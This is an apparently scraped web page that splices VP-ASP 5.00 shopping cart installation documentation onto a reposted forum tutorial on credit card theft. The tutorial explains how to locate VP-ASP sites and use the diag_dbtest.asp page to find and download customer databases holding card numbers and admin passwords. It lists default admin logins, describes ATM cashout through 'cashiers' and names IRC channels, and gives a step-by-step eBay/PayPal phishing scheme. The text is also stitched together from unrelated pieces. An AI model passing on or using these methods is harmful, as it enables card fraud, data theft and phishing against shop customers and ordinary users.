VP-ASP offers both an open-source shopping cart and an all-in-one ecommerce solution. Our software is fully customizable and contains thousands of ecommerce features making it one of the most powerful shopping carts available. Hack Credit Card VP-ASP Shopping Cart 5.00 Exploit-1 Hi guys, Today we are going to learn about credit card hacking. Its not exactly a big hacking but it can be a useful hacking. VP-ASP Shopping Cart Review VP-ASP is an extremely deep, feature rich open source shopping cart built for the Microsoft IIS server platform. It is intended for business owners and webmasters with a moderate level of technical skill that are looking for a flexible platform that is relatively quick to roll out, and highly customizable.
VP-ASP Shopping cart is one of the most comprehensive e-commerce solutions available anywhere and for any price. VP-ASP has hundreds of facilities that you can turn on as you them using our extensive browser base shop configuration.
See www.vpasp.com/virtprog/vpasptechnical.htm for a summary of the hundreds of Shopping cart facilities you can use.

Installation should only take 5 minutes.
When you receive VP-ASP it will be in the form of a zip file. You will need a utility such as WinZip to uncompress the one file into 200+ files.

All are files stored in a single folder. The steps to install are:

Vp Asp Shopping Cart 5.00 Software Installed

1. Unzip files to a folder of your choice on your PC or web host.
2. Tell Windows where you just installed the files if running on your own PC.
3. Optionally update file shop$config.asp to tell VP-ASP the location and type of database you plan to use.
Install is complete

Documentation

The Detailed Design Guides are packed with information. The design guides can be downloaded from the web.
Developer's guidehttp://www.vpasp.com/virtprog/vpasp500developer.zip
Merchant's Guidehttp://www.vpasp.com/virtprog.vpasp500merchant.zip
Option Package Guidehttp://www.vpasp.com/virtprog/vpasp500optiondesign.zip
Add-ons Guidehttp://www.vpasp.com/virtprog/vpasp500addonsdesign.zip
Technical specificationshttp://www.vpasp.com/virtprog/vpasptechnical.htm
Customer Siteshttp://www.vpasp.com/demos/vpaspsites
Forumhttp://www.vpasp.com/virtprog/vpaspforum
Additional Helphttp://www.vpasp.com/virtprog/helpdesk

Vp Asp 5.00 Sites

ASP (Active Server Pages) is Microsoft's programming language for the Internet. VP-ASP is a combination of ASP files and plain HTML files. To use ASP you need a web browser and the correct set of Windows software.

Since you are reading this document, you already have a web browser. But do you have the correct Windows Software.

First determine what Windows operating system you have and then determine if you have the appropriate Microsoft prerequisites.
Windows 95/98 If you have Windows 95/98 VP-ASP requires that you have the free Microsoft product called Personal Web Server (PWS).
If you do not have PWS installed, then you must install it. It comes either free on your Windows CDROM or it can be downloaded from the web. Please see http://www.vpasp.com/virtprog/info/faq_pws.htm
Windows NT/2K/XP Professional VP-ASP requires that you have Microsoft Internet Information Server (IIS). This is available on the NT or XP CDROM.
Windows ME/XP Home Unfortunately Microsoft has not made available any software that can run ASP on these operating systems. To evaluate VP-ASP you will need to use VP-ASP on your web hosting company.
Steps to install VP-ASP on your local PC
  1. Unzip the files to a folder on your hard drive
  2. Tell IIS or PWS that this is a virtual directory. See Windows 95/98/NT PWS or Windows XP Set-up for the proper way to do this if you have never done it before

VP-ASP is installed

Starting the Shop.
VP-ASP must be used from a web browser. Do not use your Windows Explorer
The next step is to run VP-ASP
1. Start your browser
2. Type http://127.0.0.1/shopping or http://localhost/shopping
3. You should now see the default VP-ASP home page
4. Click on the shop button and you should see the demo shop categories.
What can go wrong?

The most common problems are these:
1. Instead of seeing the shop categories, a program tries to load.
This is caused by an incorrect setting of your virtual directory. Please see
http://www.vpasp.com/virtprog/info/faq_helpme.htm
2. On Windows NT/XP an error occurs trying to write to the supplied VP-ASP Access database.
This is because the correct permissions have not been set that allow people from a browser to update the database. Use our diagnostic tool diag_dbtest.asp to test the database and then see our help file at http://www.vpasp.com/virtprog/info/faq_databasesetup.htm
3. The Database cannot be opened, You get errors such as
ADODB.Recordset error '800a0e7d' The application requested an operation on an object with a reference to a closed or invalid Connection object.
This means that VP-ASP cannot open the database. First run the diagnostic tool diag_dbtest.asp Then check our FAQ at http://www.vpasp.com/virtprog/info/faq_setup.htm
If running on your web host, make sure they have the necessary pre-requisites. See www.vpasp.com/virtprog/info/faq_hosting.htm
  1. Create a folder on your web host. Copy the files from your PC to your web hosting company using your normal FTP tools. such as CuteFTP or WSFTP.
  2. Copy the supplied Access database, shopping500.mdb, to a special directory your web host supplies. It cannot be in the same folder as the rest of VP-ASP. Most web hosting companies supply a special database directory since normal directories on a web host are read only.
  3. You must edit shop$config.asp to tell VP-ASP where the database is located. See www.vpasp.com/virtprog/info/faq_databasesetup.htm
  4. To use VP-ASP and see demo shop, use your browser and type www.yoursite.com/shopping. The shopping is the folder you copied the VP-ASP files into on your web host.
  5. Now run our supplied diagnostic tool, diag_dbtest.asp. Make sure the database can be read and written.
SQL Server Set-up
The SQL server scripts are not included in free version. They will be sent on request for potential buyers of VP-ASP.

SQL Server is a complex Microsoft software product. From the VP-ASP point of view it is very simple to use. The steps in using SQL Server are:

  1. Create the SQL Server database. This can be done using SQL Server's Query analyzer or it may have been created for you by your web hosting company

  • Add the VP-ASP Tables

  • Load the configuration table with default values

  • Optionally add the demo shop values

    • Vp Asp Shopping Cart 5.00 Software Installed Online

    Creating the SQL Server – Query Analyzer
    The database needs to be created using SQL Server Query Analyzer or your web hosting company sometimes creates the database for you. Query Analyzer comes as part of the Microsoft SQL Server Product and is not supplied by VP-ASP.
    YOU CANNOT USE THE UPSIZING WIZARD TO BUILD VP-ASP TABLES

    1 Query Analyzer Creation
    Simply start Query Analyzer. Open the file create500sqlserver.sql and run the script. It should take about ten seconds. The database and the tables are now created. Continue in the step to load default Configuration
    Updating Shop$config.asp
    The shop$config.asp settings should be as follows:
    Xdatabase=yourdatabasename
    xdatabasetype='SQLSERVER”
    xSqlUser=”youruserid”
    xSQlpwd=”yourpassword”
    xSQLServer=”www.yoursite.com” or IP Address in form “124.77.090.90”

    OR

    Web Hosting company has created the database
    If your web hosting company has already created the database and you DO NOT have the ability to use Query Analyzer, then VP-ASP supplies a tool called convertsql.asp. This tool can be used to REPLACE query analyzer for doing some tasks. It cannot create the database.
    It can build the tables and load the default configuration. It can also load the demo shop if required.
    To use convertsql.asp, you must first tell VP-ASP where the empty SQL Server database is located by changing these lines in shop$config.asp
    Xdatabase=”yourdatabasename”
    xdatabasetype='SQLSERVER”
    xSqlUser=”youruserid”
    xSQlpwd=”yourpassword”
    xSQLServer=”www.yoursite.com” or IP Address in form “111.22.333.90”
    Regardless of which method you have built the tables (QUERY analyzer or using convertsql), you must now load the tables with the VP-ASP base configuration values

    Building SQL Server Tables

    Type in the filename
    Create500sqlserver.txt

    You will see messages being displayed telling you the tables that are being created. If you get an error that the database cannot be read or written, check the shop$config statements above.
    Loading the Configuration File
    The next step is to load the default configuration options. Now start convertsql.asp by typing the location where you installed VP-ASP www.yoursite.com/shopping/convertsql.asp
    Type in file name below. This loads the initial configuration and language file
    Create500admin.txt

    Loading Demo Shop
    This step is only necessary if you want to “play” with VP-ASP demo shop. Otherwise it is not necessary. Use convertsql.asp and type in the filename create500demo.txt. This loads the database with the demo shop.

    Shop administration is for the merchant or web developer and not for the customer. The administration facilities include: Details of Administration are in the VP-ASP Merchan'ts Guide and VP-ASP Developers Guide. Fn browning 1922 serial numbers.
    Two userids are defined:
    admin with password admin
    vpasp with password vpasp

    · Add, delete and modify products
    · Add, delete and modify any other VP-ASP table
    · Define administrator userids
    · Define menus and tasks for each administrator
    · Restrict administrators to viewing or updating specific tables
    · Display sales reports
    · Perform searches of the database
    · Export data from tables
    · Mail to selected customers
    · Configure most of VP-ASP options
    · Send messages to customers via order tracking
    and much more
    The first step is to verify the shop works by clicking on the shop. This should bring up the demo categories if the demo store is installed. If you simply want to play with the demo store, it will run immediately and no further configuration is required.
    Vp asp shopping cart 5.00 software installed free
    To log into VP-ASP Administration, click on the Merchant Administration hyperlink. After you login go to Shop Configuration. Administration is used to:

    Vp Asp Shopping Cart 5.00 Software Installed Download

    VP-ASP 'look and feel' are controlled by these files. The VP-ASP Developer's Guide goes into great detail on how to make VP-ASP look any way you want.
    shoppage_header.htm will be displayed as your top and or top/left navigation bars and logo.
    shoppage_trailer.htm will be displayed as your bottom navigation bars.
    shop$colors.asp has much of the HTML generated by VP-ASP
    shop.css is the style sheet used
    Shop Configuration
    The shop configuration is browser based. This means that you can login to VP-ASP Merchant Administration, Select Shop Configuration and start changing the options you require. See www.vpasp.com/virtprog/info/faq_configuration.
    The diagnostic facility, diag_dbtest.asp, can be used to determine if your database and mailing system are working. The fields displayed come from the configuration file shop$config.asp. You can play with different values. If you move the database, we recommend you run this diagnostic tool to verify the database can be read and written to.
    If diag_dbtest works, you should receive a message such as:
    VP-ASP Diagnostics 5.00
    Database ReadDatabase can be read
    Database WriteDatabase can be written
    Database PermissionsDatabase permissions tested OK
    SummaryNo problems reading or writing database

    Read Failures

    The possible causes are:

    1. xdblocation='abc' is not correctly set and VP-ASP is looking in the wrong location.

    2. The directory where the database is located does not have read/write permission

    3. You are using ODBC connection and the name in the configuration file
      xdatabase='odbcname' is spelled incorrectly.

    Write Failures
    Always occur with read failures. If the database can be read but not written then possible causes are:

    1. The directory where the database is located does not have write permission.

    2. See the reasons outlined in the section before this.
      Check the FAQ at www.vpasp.com/virtprog/info/faq_databasesetup.htm

    This thread was last edited: 3 days ago
    As this tutorials is not written my me . i found it good . so want to share u all guys
    This tutorial is divided in two parts.
    Introduction into Credit Cards
    Credit card Hacking
    Note: Hacking credit cards is an illegal act, this is only informational post and I am not responsible for any actions done by you after reading this tutorial. This post is for educational purposes only.
    Lets start with some easy terms.
    What is credit card ?
    Credit cards are of two types:
    Debit Card
    Credit Card
    1. Debit means u have a sum of amount in it and u can use them.
    2. Credit means u have a credit line limit like of $10000 and u can use them and by the end of month pay it to bank.
    To use a credit card on internet u just not need cc number and expiry but u need many info like :
    First name
    Last name
    Address
    City
    State
    Zip
    Country
    Phone
    CC number
    Expiry
    CVV2 ( this is 3digit security code on backside after signature panel )
    If you get that info you can use that to buy any thing on internet, like software license, porn site membership, proxy membership, or any thing (online services usually, like webhosting, domains).
    If u want to make money $ through hacking then you need to be very lucky.. you need to have a exact bank and bin to cash that credit card through ATM machines.
    Let me explain how ?
    First study some simple terms.
    BINS = first 6 digit of every credit card is called ' BIN ' (for example cc number is : 4121638430101157 then its bin is ' 412163 '), i hope this is easy to understand.
    Now the question is how to make money through credit cards. Its strange.., well you cant do that, but there is specific persons in world who can do that. They call them selves ' cashiers '. You can take some time to find a reliable cashiers.
    Now the question is every bank credit cards are cashable and every bin is cashable? Like citibank, bank of america , mbna . are all banks are cashables ? Well answer is ' NO '. If u know some thing, a little thing about banking system, have u ever heard what is ATM machines? Where u withdraw ur cash by putting ur card in.
    Every bank don't have ATM, every bank don't support ATM machines cashout. Only few banks support with their few bins (as u know bin is first 6 digit of any credit / debit card number), for suppose bank of america. That bank not have only 1 bin, that bank is assigned like, 412345 412370 are ur bins u can make credit cards on them. So bank divide the country citi location wise, like from 412345 - 412360 is for americans, after that for outsiders and like this. I hope u understand. So all bins of the same bank are even not cashable, like for suppose they support ATM in New York and not in California, so like the bins of California of same bank will be uncashable. So always make sure that the bins and banks are 100% cashable in market by many cashiers.
    Be sure cashiers are legit, because many cashiers r there which take your credit card and rip u off and don't send your 50% share back.
    You can also find some cashiers on mIRC *( /server irc.unixirc.net:6667 ) channel : #cashout, #ccpower
    Well, check the website where u have list of bins and banks mostly 101% cashable. If u get the credit card of the same bank with same bin, then u can cashout otherwise not . Remember for using credit card on internet u don't need PIN ( 4 words password which u enter in ATM Machine ), but for cashout u need. You can get pins only by 2nd method of hacking which i still not post but i will. First method of sql injection and shopadmin hacking don't provide with pins, it only give cc numb cvv2 and other info which usually need for shopping not for cashing.
    Credit Card Hacking
    CC (Credit Cards) can be hacked by two ways:
    Credit Card Scams ( usually used for earning money , some times for shopping )
    Credit Card Shopadmin Hacking ( just for fun, knowledge, shopping on internet )
    1. Shopadmin Hacking
    This method is used for testing the knowledge or for getting the credit card for shopping on internet, or for fun, or any way but not for cashing ( because this method don't give PIN - 4 digit passcode ) only gives cc numb , cvv2 and other basic info.
    Shopadmins are of different companies, like: VP-ASP , X CART, etc. This tutorial is for hacking VP-ASP SHOP.
    I hope u seen whenever u try to buy some thing on internet with cc, they show u a well programmed form, very secure. They are carts, like vp-asp xcarts. Specific sites are not hacked, but carts are hacked.
    Below I'm posting tutorial to hack VP ASP cart. Now every site which use that cart can be hacked, and through their *mdb file u can get their clients 'credit card details', and also login name and password of their admin area, and all other info of clients and comapny secrets.
    Lets start:
    Type: VP-ASP Shopping Cart
    Version: 5.00
    How to find VP-ASP 5.00 sites?
    Finding VP-ASP 5.00 sites is so simple..
    1. Go to google.com and type: VP-ASP Shopping Cart 5.00
    2. You will find many websites with VP-ASP 5.00 cart software installed
    Now let's go to the exploit.
    The page will be like this: ****://***.victim.com/shop/shopdisplaycategories.asp
    The exploit is: diag_dbtest.asp
    Now you need to do this: ****://***.victim.com/shop/diag_dbtest.asp
    A page will appear contain those:
    xDatabase
    shopping140
    xDblocation
    resx
    xdatabasetypexEmailxEmail NamexEmailSubjectxEmailSy stemxEmailTypexOrdernumbe r
    Example:
    The most important thing here is xDatabase
    xDatabase: shopping140
    Ok, now the URL will be like this: ****://***.victim.com/shop/shopping140.mdb
    If you didn't download the Database, try this while there is dblocation:
    xDblocation
    resx
    the url will be: ****://***.victim.com/shop/resx/shopping140.mdb
    If u see the error message you have to try this :
    ****://***.victim.com/shop/shopping500.mdb
    Download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at http://download.cnet.com/download.com, or use
    Code:
    http://office.microsoft.com/en-us/access/
    Access.
    Inside you should be able to find credit card information, and you should even be able to find the admin username and password for the website.
    The admin login page is usually located here: ****://***.victim.com/shop/shopadmin.asp
    If you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all, then try to find the admin login page and enter the default passwords which are:
    Username: admin
    password: admin
    OR
    Username: vpasp
    password: vpasp
    2. Hacking Through Scams
    This method is usually used to hack for earning money. What happens in this method is you create a clone page.
    Target: its basically eBay.com or paypal.com for general credit cards, or if u want to target any specific cashable bank like regionbank.com then u have to create a clone page for that bank.
    What is eBay.com?
    Its a shopping site world wide which is used by many of billion people which use their credit cards on ebay. What you do make a similar page same as eBay and upload it on some hosting which don't have any law restrictions, try to find hosting in Europe they will make your scam up for long time, and email the users of eBay.
    How to get the emails of their users?
    Go to google.com and type 'Email Harvestor' or any Email Spider and search for eBay Buyers and eBay Sellers and u will get long list. That list is not accurate but out of 1000 atleast 1 email would be valid. Atleast you will get some time.
    Well u create a clone page of ebay, and mail the list u create from spider with message, like 'Your account has been hacked' or any reason that looks professional, and ask them to visit the link below and enter your info billing, and the scam page have programming when they enter their info it comes directly to your email.
    In the form page u have PIN required so u also get the PIN number through which u can cash through ATM .
    Now if u run ebay scam or paypal scam, its up to your luck who's your victim. A client of bank of america or of citibank or of region, its about luck, maybe u get cashable, may be u don't its just luck, nothing else.
    Search on google to download a scam site and study it !
    After you create your scam site, just find some email harvestor or spider from internet (download good one at Bulk Email Software Superstore - Email Marketing Internet Advertising) and create a good email list.
    And you need to find a mailer (mass sending mailer) which send mass - emails to all emails with the message of updating their account on ur scam page ). In from to, use email '[email protected]' and in subject use : eBay - Update Your eBay Account and in Name use eBay
    Some Instructions:
    1. Make sure your hosting remains up or the link in the email u will send, and when your victim emails visit it, it will show page cannot be displayed, and your plan will be failed.
    2. Hardest point is to find hosting which remains up in scam. even i don't find it easily, its very very hard part.
    3. Maybe u have contacts with someone who own hosting company and co locations or dedicated he can hide your scam in some of dedicated without restrictions.
    4. Finding a good email list (good means = actually users)
    5. Your mass mailing software land the emails in inbox of users.
    That's all folks. Hope you will find this tutorial useful. And remember, hacking credit cards is an illegal act, this is only informational post and I am not responsible for any actions done by you after reading this tutorial.